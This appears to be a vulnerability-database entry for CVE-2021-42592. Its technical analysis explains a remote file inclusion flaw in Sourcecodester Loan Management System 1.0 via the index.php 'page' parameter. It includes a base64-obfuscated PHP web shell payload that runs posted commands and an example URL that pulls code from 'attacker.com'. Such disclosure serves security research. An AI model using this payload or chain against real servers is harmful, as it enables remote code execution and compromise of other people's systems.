Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2021-42592

Last updated October 18, 2021
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Add Assessment

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis
  • A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php
    The bug is affecting the [index.php] file through [page] parameter due to unsafe usage of remotely [include] function;

  • if we tak a look at the index.php file we can see the following code:

<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>

The index file have a parameter page and by default the value is home. Then its including the home page add .php to it.

Attacker login to the panel then create a PHP file that contains malicious PHP code on a remote server then pass the malicious file URL to the target through the [page] parameter and the target execute the code which gives permissions to the attacker to do malicious activities such as ( Delete, create, modify &, etc..) on the target server and the attacker will be able to achieve RCE ( remote code execution ).

Note: To make the server execute your malicious code your code must be like that:

 <?php
 echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg==");
 ?>

E.x: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.

General Information

Additional Info

Technical Analysis